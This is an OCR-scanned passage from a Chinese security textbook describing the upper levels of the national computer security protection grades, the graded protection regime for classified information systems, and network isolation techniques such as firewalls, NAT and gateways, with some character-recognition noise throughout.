维护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数据 。 计 算 机 信息 系统 可 信 计 算 基 使 用 
这 些 数 据 鉴别 用 户 身份 ， 并 使 用 保护 机 制 ( 例 如 : 口令 ) 来 鉴别 用 户 的 身份 , 阻止 非 授 
权 用 户 访问 用 户 身份 鉴别 数据 。 通 过 为 用 户 提供 唯一 标识 ， 计 算 机 信息 系统 可 信 计 算 基 
E 够 使 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 基 还 具备 将 身份 标识 与 该 用 户 
所 有 可 审计 行为 相关 联 的 能 力 ， 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ， 并 能 阻 
止 非 授权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 
地 址 空间 (例如 : 打开 文件 、 程 序 初始 化 ); 删除 客体 ;由 操作 员 、 系 统管 理 员 或 (和 ) 
系统 安全 管理 员 实施 的 动作 ， 以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ， 其 审计 
记录 包括 : 事件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 、 事 件 是 否 成 功 。 对 于 身份 鉴别 事件 ， 
审计 记录 包含 请 求 的 来 源 (例如 : 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客 
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体 删除 事件 ， 审 计 记录 包含 客体 名 及 客体 的 安全 级 别 。 此 外 ， 计 算 机 信息 系统 可 信 计 算 
基 具 有 审计 更 改 可 读 输 出 记号 的 能 力 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 事件 ， 审 计 机 制 提供 审计 记录 
接口 ， 可 由 授权 主体 调用 。 这 些 审 计 记 录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独 立 分 辨 的 
审计 记录 。 

计算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 ， 阻 止 非 授权 用 户 修改 或 破 
坏 敏 感 信息 。 在 网 络 环境 中 ， 使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 受 损 。 

4. 第 四 级 结构 化 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 建立 于 一 个 明确 定义 的 形式 化 安全 策略 模型 之 
上 ， 它 要 求 将 第 三 级 系统 中 的 自主 和 强制 访问 控制 扩展 到 所 有 主体 与 客体 。 此 外 ， 还 要 
考虑 隐蔽 通道 。 本 级 的 计算 机 信息 系统 可 信 计 算 基 必须 结构 化 为 关键 保护 元 素 和 非 关键 
保护 元 素 。 计 算 机 信息 系统 可 信 计 算 基 的 接口 也 必须 明确 定义 ， 使 其 设计 与 实现 能 经 受 
更 充分 的 测试 和 更 完整 的 复审 。 加 强 了 鉴别 机 制 ， 支持 系 统管 理 员 和 操作 员 的 职能 ， 提 
供 可 信 设 施 管理 ， 增 强 了 配置 管理 控制 。 系 统 具 有 相当 的 抗 渗透 能 力 。 

在 第 三 级 实施 的 自主 和 强制 访问 控制 基础 上 ， 进 一 步 扩展 到 所 有 主体 和 客体 。 计 算 
机 信息 系统 可 信 计 算 基 对 外 部 主体 能 够 直接 或 间接 访问 的 所 有 资源 〈 例 如 : 主体、 存储 
客体 和 输入 输出 资源 ) 实施 强制 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 维护 与 可 被 外 部 
主体 直接 或 间接 访问 到 的 计算 机 信息 系统 资源 〈 例 如 : 主体 、 存 储 客体 、 只 读 存储 器 ) 


相关 的 敏感 标记 。 
在 第 三 级 审计 的 基础 上 ， 计 算 机 信息 系统 可 信 计 算 基 能 够 审计 利用 隐蔽 存储 信道 时 
可 能 被 使 用 的 事件 。 


计算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 。 阻 止 非 授权 用 户 修改 或 破 
坏 敏 感 信 息 。 在 网 络 环境 中 ， 使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 受 损 。 

系统 开发 者 应 彻底 搜索 隐蔽 存储 信道 ， 并 根据 实际 测量 或 工程 估算 确定 每 一 个 被 标 
识 信道 的 最 大 带宽 。 

对 用 户 的 初始 登录 和 上 鉴别， 计算 机 信息 系统 可 信 计 算 基 在 它 与 用 户 之 问 提 供 可 信 通 
信 路 径 。 该 路 径 上 的 通信 只 能 由 该 用 户 初始 化 。 

5. 第 五 级 访问 验证 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 满足 访问 监控 器 需求 。 访 问 监控 器 仲裁 主体 对 客 
体 的 全 部 访问 。 访 问 监控 器 本 身 是 抗 自 改 的 ， 必 须 足 够 小 ， 能 够 分 析 和 测试 。 为 了 满足 
访问 监控 器 需求 ， 计 算 机 信息 系统 可 信 计 算 基 在 其 构造 时 ， 排 除 那些 对 实施 安全 策略 来 
说 并 非 必要 的 代码 ; 在 设计 和 实现 时 ， 从 系统 工程 角度 将 其 复杂 性 降低 到 最 小 程度 。 支 
持 安 全 管理 员 职 能 ;扩充 审计 机 制 ， 当 发 生 与 安全 相关 的 事件 时 发 出 信号 ; 提供 系统 恢 
复 机 制 。 系 统 具有 很 高 的 抗 渗透 能 力 。 

与 第 四 级 相 比 ， 自 主 访问 控制 机 制 根据 用 户 指定 方式 或 默认 方式 ， 阻 止 非 授权 用 户 
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访问 客体 。 访 问 控制 的 粒度 是 单个 用 户 。 访 问 控制 能 够 为 每 个 命名 客体 指定 命名 用 户 和 
用 户 组 ， 并 规定 他 们 对 客体 的 访问 模式 。 没 有 存 取 权 的 用 户 只 允许 由 授权 用 户 指定 对 客 
体 的 访问 权 。 

审计 方面 ， 计 算 机 信息 系统 可 信 计 算 基 包含 能 够 监控 可 审计 安全 事件 发 生 与 积累 的 
机 制 ， 当 超过 阐 值 时 ， 能 够 立即 向 安全 管理 员 发 出 报警 。 并 且 ， 如 果 这 些 与 安全 相关 的 
事件 继续 发 生 或 积累 ， 系 统 应 以 最 小 的 代价 中 止 它们 。 

对 于 可 信 路 径 ， 当 连接 用 户 时 《如 注册 、 更 改 主体 安全 级 )， 计 算 机 信息 系统 可 信 
计算 基 提 供 它 与 用 户 之 间 的 可 信 通 信 路 径 。 可 信 路 径 上 的 通信 和 只 能 由 该 用 户 或 计算 机 信 
息 系统 可 信 计 算 基 激活 , 且 在 逻辑 上 与 其 他 路 径 上 的 通信 相隔 离 , 且 能 正确 地 加 以 区 分 。 
计算 机 信息 系统 可 信 计 算 基 提供 过 程 和 机 制 ， 保 证 计算 机 信息 系统 失效 或 中 断后 ， 可 以 
进行 不 损害 任何 安全 保护 性 能 的 恢复 。 
1.3.2.2 ”分 级 保护 

1997 年 《中 共 中 央 关 于 加 强 新 形势 下 保密 工作 的 决定 》 明 确 了 在 新 形势 下 保密 工作 
的 指导 思想 和 基本 任务 ， 提 出 要 建立 与 《保密 法 》 相 配套 的 保密 法 规 体 系 和 执法 体系 ， 
建立 现代 化 的 保密 技术 防范 体系 。 中央 保密 委员 会 于 2004 年 12 月 23 日 下 发 了 《关于 加 
强 信息 安全 保障 工作 中 保密 管理 若干 意见 》 明 确 提出 要 建立 健全 涉 密 信息 系统 分 级 保护 
制度 。2005 年 12 月 28 日 ， 国 家 保密 局 下 发 了 《涉及 国家 秘密 的 信息 系统 分 级 保护 管理 
办 法 》， 同 时 ，《 保 密 法 》 修 订 草 案 也 增加 了 网 络 安全 保密 管理 的 条 款 。 随 着 《保密 法 》 
的 贯彻 实施 ， 国 家 已 经 基本 形成 了 完善 的 保密 法 规 体系 。 

涉 密 信息 系统 分 级 保护 保护 的 对 象 是 所 有 涉及 国家 秘密 的 信息 系统 ， 重 点 是 党 政 机 
关 、 军 队 和 军工 单位 , 由 各 级 保密 工作 部 门 根据 涉 密 信 息 系 统 的 保护 等 级 实施 监督 管理 ， 
确保 系统 和 信息 安全 ， 确 保 国家 秘密 不 被 泄漏 。 国 家 秘密 信息 是 国家 主权 的 重要 内 容 ， 
关系 到 国家 的 安全 和 利益 ， 一 旦 泄露 ， 必 将 直接 危害 国家 的 政治 安全 、 经 济 安全 、 国 防 
安全 、 科 技 安全 和 文化 安全 。 没 有 国家 秘密 的 信息 安全 ， 国 家 就 会 丧失 信息 主权 和 信息 
控制 权 ， 所 以 国家 秘密 的 信息 安全 是 国家 信息 安全 保障 体系 中 的 重要 组 成 部 分 。 

因为 不 同类 别 、 不 同 层次 的 国家 秘密 信息 ， 对 于 维护 国家 安全 和 利益 具有 不 同 的 价 
值 ， 所 以 需要 不 同 的 保护 强度 种 措施 。 对 不 同 密级 的 信息 ， 应 当 合理 平衡 安全 风险 与 成 
本 ， 采 取 不 同 强度 的 保护 措施 ， 这 就 是 分 级 保护 的 核心 思想 。 对 涉 密 信息 系统 实行 分 级 
保护 ， 就 是 要 使 保护 重点 更 加 突出 ， 保 护 方法 更 加 科学 ， 保 护 的 投入 产 出 比 更 加 合理 ， 
从 而 彻底 解决 长 期 困扰 涉 密 单位 在 涉 密 信息 系统 建设 使 用 中 的 网 络 互联 与 安全 保密 
问题 。 

涉 密 信息 系统 实行 分 级 保护 ， 先 要 根据 涉 密 信 息 的 涉 密 等 级 ， 涉 密 信息 系统 的 重要 
性 ， 遭 到 破坏 后 对 国计民生 造成 的 危害 性 ， 以 及 涉 密 信息 系统 必须 达到 的 安全 保护 水 平 
来 确定 信息 安全 的 保护 等 级 ， 涉 密 信息 系统 分 级 保护 的 核心 是 对 信息 系统 安全 进行 合理 
分 级 、 按 标准 进行 建设 、 管 理 和 监督 。 国 家 保密 局 专门 对 涉 密 信息 系统 如 何 进行 分 级 保 
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护 制定 了 一 系列 的 管理 办 法 和 技术 标准 ， 目 前 ， 正 在 执行 的 两 个 分 级 保护 的 国家 保密 标 
准 是 BMB17《 涉 及 国家 秘密 的 信息 系统 分 级 保护 技术 要 求 》 和 BMB20《 涉 及 国家 秘密 
的 信息 系统 分 级 保护 管理 规范 》。 从 物理 安全 、 信 息 安全 、 运 行 安全 和 安全 保密 管理 等 
方面 ， 对 不 同 级 别 的 涉 密 信息 系统 有 明确 的 分 级 保护 措施 ， 从 技术 要 求 和 管理 标准 两 个 
层面 解决 涉 密 信息 系统 的 分 级 保护 问题 。 

涉 密 信 息 系统 安全 分 级 保护 根据 其 涉 密 信息 系统 处 理 信 息 的 最 高 密级 ， 可 以 划分 为 
秘密 级 、 机 密级 和 机 密级 (增强 ) 、 绝 密级 三 个 等 级 : 

CL) 秘密 级 ， 信 息 系统 中 包含 有 最 高 为 秘密 级 的 国家 秘密 ， 其 防护 水 平 不 低 于 国家 
信息 安全 等 级 保护 三 级 的 要 求 ， 并 且 还 必须 符合 分 级 保护 的 保密 技术 要 求 。 

(2) 机 密级 ， 信 息 系统 中 包含 有 最 高 为 机 密级 的 国家 秘密 ， 其 防护 水 平 不 低 于 国家 
信息 安全 等 级 保护 四 级 的 要 求 ， 还 必须 符合 分 级 保护 的 保密 技术 要 求 。 属 于 下 列 情况 之 
一 的 机 密级 信息 系统 应 选择 机 密级 增强 ) 的 要 求 : 

。 信息 系统 的 使 用 单位 为 副 省 级 以 上 的 党 政 首脑 机 关 , 以 及 国防 、 外交 、 国 家 安全 、 

军工 等 要 害 部 门 ; 

。 信息 系统 中 的 机 密级 信息 含量 较 高 或 数量 较 多 

。 信息 系统 使 用 单位 对 信息 系统 的 依赖 程度 较 高 。 

(3) 绝密 级 ， 信 息 系统 中 包含 有 最 高 为 绝密 级 的 国家 秘密 ， 其 防护 水 平 不 低 于 国家 
信息 安全 等 级 保护 五 级 的 要 求 ， 还 必须 符合 分 级 保护 的 保密 技术 要 求 ， 绝 密级 信息 系统 
应 限定 在 封闭 的 安全 可 控 的 独立 建筑 内 ， 不 能 与 城 域 网 或 广域网 相连 。 

涉 密 信息 系统 分 级 保护 的 管理 过 程 分 为 八 个 阶段 ， 即 系统 定 级 阶段 、 安 全 规划 方案 
设计 阶段 、 安 全 工程 实施 阶段 、 信 息 系统 测评 阶段 、 系 统 审批 阶段 、 安 全 运行 及 维护 阶 
段 、 定 期 评测 与 检查 阶段 和 系统 隐 退 终止 阶段 等 。 在 实际 工作 中 , 涉 密 信息 系统 的 定 级 、 
安全 规划 方案 设计 的 实施 与 调整 、 安 全 运行 及 维护 三 个 阶段 ， 尤 其 要 引起 重视 。 这 三 个 
阶段 的 具体 实施 方法 如 下 : 

1. 涉 密 信息 系统 的 定 级 

系统 定 级 决定 了 系统 方案 的 设计 实施 、 安 全 措施 、 运 行 维护 等 涉 密 信息 系统 建设 的 
各 个 环节 ， 因 此 如 何 准确 地 对 涉 密 信息 系统 进行 定 级 在 涉 密 信息 系统 实施 分 级 保护 中 万 
为 重要 。 涉 密 信息 系统 定 级 遵循 “ 谁 建 设 、 谁 定 级 ”的 原则 ， 可 以 根据 信息 密级 、 系 统 
重要 性 和 安全 策略 划分 为 不 同 的 安全 域 ， 针 对 不 同 的 安全 域 确定 不 同 的 等 级 ， 并 进行 相 
应 的 保护 。 在 涉 密 信 息 系 统 定 级 时 ， 可 以 综合 考虑 涉 密 信 息 系统 中 资产 、 威 胁 、 受 到 损 
害 后 的 影响 ， 以 及 使 用 单位 对 涉 密 信息 系统 的 信赖 性 等 因素 对 涉 密 信息 系统 进行 整体 定 
级 ; 同时， 在 同一 个 系统 里 ， 还 允许 划分 不 同 的 安全 域 ， 在 每 个 安全 域 可 以 分 别 定 级 ， 
不 同 的 级 别 采取 不 同 的 安全 措施 ， 更 加 科学 地 实施 分 级 保护 ， 在 一 定 程度 上 可 以 解决 保 
重点 ， 保 核心 的 问题 ， 也 可 以 有 效 地 避免 因 过 度 保护 而 造成 应 用 系统 运行 效能 降低 以 及 
投资 浪费 等 问题 。 涉 密 信息 系统 建设 单位 在 定 级 的 同时 ， 必 须 报 主管 部 门 审批 。 
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2. 安全 规划 方案 设计 的 设施 与 调整 

涉 密 信息 系统 要 按照 分 级 保护 的 标准 ， 结 合 涉 密 信 息 系 统 应 用 的 实际 情况 进行 方案 
设计 。 设 计时 要 逐 项 进行 安全 风险 分 析 ， 并 根据 安全 风险 分 析 的 结果 ， 对 部 分 保护 要 求 
进行 适当 的 调整 和 改造 ， 调 整 应 以 不 降低 涉 密 信息 系统 整体 安全 保护 强度 ， 确 保 国家 秘 
密 安全 为 原则 。 当 保护 要 求 不 能 满足 实际 安全 需求 时 ， 应 适当 选择 采用 部 分 较 高 的 保护 
要 求 ， 当 保护 要 求 明显 高 于 实际 安全 需求 时 ， 可 适当 选择 采用 部 分 较 低 的 保护 要 求 。 对 
于 安全 策略 的 调整 以 及 改造 方案 进行 论证 ， 综 合 考虑 修改 项 和 其 他 保护 要 求 之 间 的 相关 
性 , 综合 分 析 ， 改造 方案 的 实施 以 及 后 续 测 评 要 按照 国家 的 标准 执行 并 且 要 求 文档 化 。 
在 设计 完成 之 后 要 进行 方案 论证 ， 由 建设 使 用 单位 组 织 有 关 的 专家 和 部 门 进行 方案 设计 
论证 ， 确 定 总 体 方案 达到 分 级 保护 技术 的 要 求 后 再 开始 实施 ， 在 工程 建设 实施 过 程 中 
注意 工程 监理 的 要 求 ， 建 设 完 成 之 后 应 该 进行 审批 ， 审 批 前 由 国家 保密 局 授权 的 涉 密 信 
息 系统 测评 机 构 进行 系统 测评 ， 确 定 在 技术 层面 是 否 达到 了 涉 密 信息 系统 分 级 保护 的 
要 求 。 

3. 安全 运行 与 维护 

运行 及 维护 过 程 的 不 可 控 性 以 及 随意 性 ， 往 往 是 涉 密 信 息 系 统 安全 运行 的 重大 隐 
患 。 通 过 运行 管理 和 控制 、 变 更 管理 和 控制 ， 对 安全 状态 进行 监控 ， 对 发 生 的 安全 事件 
及 时 响应 ， 在 流程 上 对 系统 的 运行 维护 进行 规范 ， 从 而 确保 涉 密 信息 系统 正常 运行 。 通 
过 安全 检查 和 持续 改进 ， 不 断 跟踪 涉 密 信息 系统 的 变化 ， 并 依据 变化 进行 调整 ， 确 保 涉 
密 信息 系统 满足 相应 分 级 的 安全 要 求 ， 并 处 于 良好 安全 状态 。 由 于 运行 维护 的 规范 化 能 
够 大 幅度 地 提高 系统 运行 及 维护 的 安全 级 别 ， 所 以 在 运行 维护 中 应 尽 可 能 地 实现 流程 固 
化 ， 操 作 自 动 化 ， 减 少 人 员 参 与 带 来 的 风险 。 还 需要 注意 的 是 在 安全 运行 及 维护 中 保持 
系统 安全 策略 的 准确 性 以 及 与 安全 目标 的 一 致 性 ， 使 安全 策略 作为 安全 运行 的 驱动 力 以 
及 重要 的 制约 规则 ， 从 而 保持 整个 涉 密 信息 系统 能 够 按照 既定 的 安全 策略 运行 。 在 安全 
运行 及 维护 阶段 ,当局 部 调整 等 原因 导致 安全 措施 变化 时 , 如果 不 影响 系统 的 安全 分 级 ， 
应 从 安全 运行 及 维护 阶段 进入 安全 工程 实施 阶段 ， 重 新 调整 和 实施 安全 措施 ， 确 保 满足 
分 级 保护 的 要 求 ， 当 系统 发 生 重大 变更 影响 系统 的 安全 分 级 时 ， 应 从 安全 运行 及 维护 阶 
段 进入 系统 定 级 阶段 ， 重 新 开始 一 次 分 级 保护 实施 过 程 。 

随 着 我 们 国家 民主 与 法 制 建设 进程 的 不 断 推进 ， 保 密 的 范围 和 事项 正在 逐步 减少 ， 
致使 一 些 涉 密 人 员 保 密 意识 和 敌情 观念 淡化 ， 对 保密 工作 的 必要 性 和 重要 性 认识 不 足 。 
虽然 长 期 处 于 和 平时 期 ， 但 并 不 意味 着 无 密 可 保 。 事 实 上 ， 政 府 部 门 掌握 着 大 量 重要 其 
至 核心 的 机 密 ， 已 成 为 各 种 窃 密 活 动 的 重点 目标 。 我 党 政 机 关 和 军工 单位 也 是 国家 秘密 
非常 集中 的 领域 ,一 直 是 窃 密 与 反 窃 密 ， 渗 透 与 反 渗透 的 主 战 场 。 据 国家 有 关 部 门 统计 ， 
在 全 国 泄密 事件 中 ， 军 工 系统 占有 很 大 比例 。 境 内 外 敌对 势力 和 情报 机 构 以 我 党 政 军机 
关 和 军工 单位 为 主要 目标 的 窃 密 活动 更 加 突出 ， 渗 透 与 反 渗透 、 窃 密 与 反 窃 密 的 斗争 更 
加 激烈 。 由 于 一 些 单位 涉 密 信息 系统 安全 保障 能 力 不 够 、 管 理 不 力 ， 导 致 涉 密 信息 系统 
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泄密 案件 的 比例 逐年 上 升 ， 安 全 保密 形势 非常 严峻 。 因 此 严格 按照 涉 密 信息 系统 分 级 保 
护 的 要 求 ， 加 强 涉 密 信息 系统 建设 意义 重大 。 
1.3.2.3 ”网 络 隔离 

国家 保密 局 在 1998 年 发 布 的 《涉及 国家 秘密 的 通信 、 办 公 自 动 化 和 计算 机 信息 系 
统 审批 暂行 办 法 》 中 明确 规定 : 涉 密 系统 不 得 直接 或 间接 与 国际 联网 ， 必 须 实行 物理 隔 
FAs 2000 年 1 月 1 日 正式 实施 的 《计算 机 信息 系统 国际 联网 保密 管理 规定 》 中 也 明确 规 
定 :“ 凡 涉及 国家 秘密 的 计算 机 信息 系统 ,不 得 直接 或 间接 地 与 国际 互联 网 或 者 其 他 公共 
信息 网 络 相连 接 ， 必 须 实 行 物理 隔离 。” 

目前 国内 外 的 趋势 都 是 用 网 络 隔离 这 个 概念 来 代替 物理 隔离 或 安全 隔离 等 。 首 先 ， 
隔离 的 概念 是 基于 网 络 来 谈 隔离 的 。 没 有 联网 的 概念 就 没有 隔离 的 必要 。 两 个 独立 的 主 
机 ， 根 本 就 没有 联网 ， 就 没 必 要 搞 隔离。 两 个 完全 独立 的 网 络 ， 完 全 不 相关 ， 也 没有 联 
网 ， 也 没有 什么 必要 搞 隔 离 。 离 开 网 络 来 谈 隔离 是 没有 意义 的 。 其 次 ， 没 有 信息 交换 或 
资源 共享 的 概念 ， 也 谈 不 上 隔离 。 两 个 完全 独立 的 网 络 ， 一 不 需要 信息 交换 ， 二 不 需要 
共享 资源 ， 本 身 就 是 完全 不 相关 也 没有 联系 的 ， 既 不 需要 联网 也 不 需要 隔离 。 因 此 ， 隔 
离 的 本 质 是 在 需要 交换 信息 甚至 是 共享 资源 的 情况 下 才 出 现 , 既 要 信息 交换 或 共享 资源 ， 
也 要 隔离 。 三 是 物理 隔离 和 安全 隔离 无 法 给 出 一 个 技术 上 的 精确 定义 。 四 是 网 络 隔离 可 
以 给 出 一 个 完整 准确 的 技术 定义 。 

网 络 隔离 是 一 项 网 络 安全 技术 ， 它 消除 了 基于 网 络 和 基于 协议 的 安全 威胁 ， 但 网 络 
隔离 技术 也 存在 局 限 性 ， 对 非 网 络 的 威胁 如 内 容 安全 ， 就 无 法 从 理论 上 彻底 排除 ， 就 像 
人 工 拷 盘 一 样 ， 交 换 的 数据 本 身 可 能 带 有 病毒 ， 即 使 查 杀 病毒 也 不 一 定 可 以 查 杀 干净 。 
但 它 不 是 网 络 安全 问题 ， 不 存在 攻击 和 入 侵 之 类 的 威胁 。 如 果 用 户 确 定 交 换 的 内 容 是 完 
全 可 信和 可 控 的 ， 那 么 网 络 隔离 是 用 户 解决 网 络 安全 问题 的 最 佳 选择 。 

网 络 隔离 技术 的 目标 是 确保 把 有 害 的 攻击 隔离 ， 在 可 信 网 络 之 外 和 保证 可 信 网 络 内 
部 信息 不 外 泄 的 前 提 下 ， 完 成 网 间 数 据 的 安全 交换 。 网 络 隔 离 技 术 是 在 原 有 安全 技术 的 
基础 上 发 展 起 来 的 ， 它 弥补 了 原 有 安全 技术 的 不 足 ， 突 出 了 自己 的 优势 。 

隔离 概念 是 在 为 了 保护 高 安全 度 网 络 环境 的 情况 下 产生 的 ; 隔离 产品 的 大 量 出 现 ， 
也 是 经 历 了 几 代 隔 离 技术 不 断 的 实践 和 理论 相 结合 后 得 来 的 。 

。 第 一 代 隔 离 技 术 : 完全 地 隔离 。 此 方法 使 得 网 络 处 于 信息 孤岛 状态 ， 做 到 了 完全 

的 物理 隔离 ， 需 要 至 少 两 套 网 络 和 系统 ， 更 重要 的 是 信息 交流 的 不 便 和 成 本 的 提 
高 ， 这 样 给 维护 和 使 用 带 来 了 极 大 的 不 便 。 

。 第 二 代 隔 离 技 术 : 硬件 卡 隔离 。 在 客户 端 增加 一 块 硬件 卡 ， 客 户 端 硬 盘 或 其 他 存 
储 设备 首先 连接 到 该 卡 ， 然 后 再 转 接 到 主板 上 ， 通 过 该 卡 能 控制 客户 端 便 盘 或 其 
他 存储 设备 。 而 在 选择 不 同 的 硬盘 时 ， 同 时 选择 了 该 卡 上 不 同 的 网 络 接口 ， 连 接 
到 不 同 的 网 络 。 但 是 ， 这 种 隔离 产品 有 的 仍然 需要 网 络 布线 为 双 网 线 结构 ， 产 品 
存在 着 较 大 的 安全 隐患 。 
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。 第 三 代 隔 离 技术 : 数据 转播 隔离 。 利用 转播 系统 分 时 复制 文件 的 途径 来 实现 隔离 ， 
切换 时 间 非 常 之 久 ， 甚 至 需要 手工 完成 ， 不 仅 明显 地 减缓 了 访问 速度 ， 更 不 支持 
常见 的 网 络 应 用 ， 失 去 了 网 络 存在 的 意义 。 

。 第 四 代 隔 离 技术 : 空气 开关 隔离 。 它 是 通过 使 用 单刀 双 掷 开 关 ， 使 得 内 外 部 网 络 
分 时 访问 临时 缓存 器 来 完成 数据 交换 的 ， 但 在 安全 和 性 能 上 存在 有 许多 问题 。 

。 第 五 代 隔 离 技 术 : 安全 通道 隔离 。 此 技术 通过 专用 通信 硬件 和 专 有 安全 协议 等 安 
全 机 制 ， 来 实现 内 外 部 网 络 的 隔离 和 数据 交换 ， 不 仅 解决 了 以 前 隔离 技术 存在 的 
问题 ， 并 有 效 地 把 内 外 部 网 络 隔离 开 来 ， 而 且 高 效 地 实现 了 内 外 网 数据 的 安全 交 
换 ， 透 明 支持 多 种 网 络 应 用 ， 成 为 当前 隔离 技术 的 发 展 方向 。 

防火 墙 是 最 常用 的 网 络 隔 离 手 段 ， 主 要 是 通过 网 络 的 路 由 控制 ， 也 就 是 访问 控制 列 

表 技 术 。 网 络 是 一 种 包 交 换 技 术 ， 数 据 包 是 通过 路 由 交换 到 达 目 的 地 的 ， 所 以 控制 了 路 
由 ， 就 能 控制 通讯 的 线路 和 数据 包 的 流向 。 早 期 的 网 络 安全 控制 方面 基本 上 是 防火 墙 。 


层 内 的 病毒 、 里 虫 都 没有 办 法 。 对 于 安全 要 求 初级 的 隔离 是 可 以 的 ， 但 对 于 需要 深层 次 
的 网 络 隔离 就 显得 不 足 了 。 值得 一 提 的 是 防火 墙 中 的 NAT 技术 。 地 址 翻译 可 以 隐藏 内 网 
AY IP Hak, 很 多 人 把 它 当 作 一 种 安全 的 防护 ， 认 为 没有 路 由 就 是 足够 安全 的 。 地 址 翻译 
其 实 是 代理 服务 器 技术 的 一 种 ， 不 让 业务 访问 直接 通过 是 在 安全 上 前 进 了 一 步 ， 但 目前 
应 用 层 的 绕 过 NAT 技术 很 普遍 , 隐藏 地 址 只 是 相对 的 。 目 前 很 多 攻击 技术 是 针对 防火 墙 
的 ， 尤 其 防火 墙 对 于 应 用 层 没 有 控制 ， 方 便 了 木马 的 进入 。 进 入 到 内 网 的 木马 看 到 的 是 
内 网 地 址 ， 直 接 报 告 给 外 网 的 攻击 者 ，NAT 的 安全 作用 就 不 大 了 。 

新 一 代 防 火 墙 技术 多 重 安全 网 关 通 过 架设 更 多 的 关卡 来 处 理 不 同类 别 的 事务 。 但 是 
其 基本 的 策略 都 是 架 桥 的 策略 ， 主 要 是 采用 安全 检查 的 方式 ， 对 应 用 的 协议 不 做 更 改 ， 
所 以 速度 快 ， 流 量 大 ， 从 客户 应 用 上 来 看 ， 没 有 不 同 。 

网 闸 的 设计 形象 的 借鉴 了 船闸 的 概念 ， 设 计 采用 “代理 + 摆渡 ”。 不 在 河上 架 桥 ， 可 
以 设 摆渡 船 ， 摆 渡船 不 直接 连接 两 岸 ， 安 全 性 当然 要 比 桥 好 ， 即 使 是 攻击 ， 也 不 可 能 一 
下 就 进入 ， 在 船上 总 要 受到 管理 者 的 各 种 控制 。 另 外 ， 网 疗 的 功能 有 代理 ， 这 个 代理 不 
只 是 协议 代理 ,而 是 数据 的 “拆卸 ”把 数据 还 原 成 原始 的 面 貌 ， 拆 除 各 种 通信 协议 添加 
的 “包头 包 尾 ” 很 多 攻击 是 通过 对 数据 的 拆 装 来 隐藏 自己 的 , 没有 了 这 些 “ 通 信和 外衣 ”， 
攻击 者 就 很 难 藏 身 了 。 网 闻 的 安全 理念 是 .网 络 隔离 一 一 “过 河 用 船 不 用 桥 ”， 用 “ 摆 
渡 方 式 ” 来 隔离 网 络 。 协 议 隔离 一 一 “禁止 采用 集装箱 运输 ” 通讯 协议 落地 ， 用 专用 
协议 或 存储 等 方式 阻 断 通讯 协议 的 连接 ， 用 代理 方式 支持 上 层 业 务 。 

按 国 家 安全 要 求 是 需要 涉 密 网 络 与 非 涉 密 网 络 互联 的 时 候 ， 要 采用 网 疗 隔 离 ; 若非 
涉 密 网 络 与 互联 网 连通 时 ， 采 用 单 向 网 闻 ， 若 非 涉 密 网 络 与 互联 网 不 连通 时 ， 采 用 双向 
网 闸 。 

交换 网 络 的 模型 来 源 于 银行 系统 的 Clark-Wilson 模型 ， 主 要 是 通过 业务 代理 与 双人 
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审计 的 思路 保护 数据 的 完整 性 。 交 换 网 络 是 在 两 个 隔离 的 网 络 之 间 建 立 一 个 数据 交换 区 
域 ， 负 责 业 务 数据 交换 ( 单 向 或 双向 )。 交 换 网 络 的 两 端 可 以 采用 多 重 网 关 ， 也 可 以 采用 
网 闻 。 在 交换 网 络 内 部 采用 监控 、 审 计 等 安全 技术 ， 整 体 上 形成 一 个 立体 的 交换 网 安全 
防护 体系 。 交 换 网 络 的 核心 也 是 业务 代理 。 客 户 业 务 要 经 过 接 入 缓冲 区 的 申请 代理 ， 到 
业务 缓冲 区 的 业务 代理 ， 才 能 进入 生产 网 络 。 网 闸 与 交换 网 络 技术 都 是 采用 渡船 策略 ， 
延长 数据 通信 “里 程 ” 增加 安全 保障 措施 。 

网 络 隔离 技术 的 安全 要 点 概括 有 如 下 几 点 : 

(1) 要 具有 高 度 的 自身 安全 性 。 隔 离 产品 要 保证 自身 具有 高 度 的 安全 性 ， 在 技术 实 
现 上 ， 除 了 对 操作 系统 进行 加 固 优化 或 采用 安全 操作 系统 外 ， 关 键 在 于 要 把 外 网 接口 和 
内 网 接口 从 一 套 操作 系统 中 分 离 出 来 。 也 就 是 说 至 少 要 由 两 套 主机 系统 组 成 ， 一 套 控 制 
外 网 接口 ， 另 一 套 控制 内 网 接口 ， 然 后 在 两 套 主机 系统 之 间 通 过 不 可 路 由 的 协议 进行 数 
据 交 换 ， 如 此 ， 即 便 黑 客 攻 破 了 外 网 系统 ， 仍 然 无 法 控制 内 网 系统 ， 就 达到 了 更 高 的 安 
全 级 别 。 

(2) 要 确保 网 络 之 问 是 隔离 的 。 保 证 网 间隔 离 的 关键 是 网 络 包 不 可 路 由 到 对 方 网 络 ， 
无 论 中 间 采 用 了 什么 转换 方法 ， 只 要 最 终 使 得 一 方 的 网 络 包 能 够 进入 到 对 方 的 网 络 中 ， 
都 无 法 称 之 为 隔离 ， 即 达 不 到 隔离 的 效果 。 显 然 ， 只 是 对 网 间 的 包 进 行 转发 ， 并 且 多 许 
建立 端 到 端 连接 的 防火 墙 ， 是 没有 任何 隔离 效果 的 。 此 外 ， 那 些 只 是 把 网 络 包 转 换 为 文 
本 ， 交 换 到 对 方 网 络 后 ， 再 把 文本 转换 为 网 络 包 的 产品 也 是 没有 做 到 隔离 的 。 

G) 要 保证 网 间 交 换 的 只 是 应 用 数据 。 既 然 要 达到 网 络 隔离 ， 就 必须 做 到 彻底 防范 
